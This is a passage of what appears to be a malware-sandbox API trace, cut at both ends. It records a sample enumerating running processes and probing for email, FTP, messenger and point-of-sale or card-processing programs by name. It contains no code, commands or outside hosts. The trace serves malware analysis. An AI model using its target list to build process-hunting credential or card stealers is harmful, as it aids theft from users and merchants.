out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0265.528] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0265.530] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0265.533] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0265.536] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0265.538] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0265.541] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0265.543] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0265.546] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0265.548] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0265.550] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0265.552] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0265.555] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0265.557] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0265.627] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0265.629] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0265.632] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0265.634] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0265.637] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0265.639] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0265.642] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0265.644] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0265.646] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0265.649] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0265.651] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0265.654] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0265.656] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0265.666] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0265.669] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0265.671] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0265.674] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0265.676] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0265.678] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0265.680] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0265.682] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0265.686] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0265.689] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0265.691] CloseHandle (hObject=0x758) returned 1 [0265.691] Sleep (dwMilliseconds=0x64) [0265.855] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0265.896] Process32First (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.898] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0265.899] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0265.901] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0265.905] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0265.907] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0265.909] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0265.910] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0265.912] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0265.913] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.915] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.916] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0265.918] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.988] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.989] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.992] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.993] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.995] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.997] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.001] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0266.003] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0266.004] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0266.006] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.007] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0266.009] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0266.010] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0266.012] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0266.018] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.021] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0266.023] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0266.026] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0266.078] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0266.080] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0266.081] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0266.083] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0266.084] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0266.086] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0266.087] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0266.088] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0266.094] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0266.097] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0266.099] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0266.101] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0266.104] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0266.107] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0266.112] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0266.113] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, 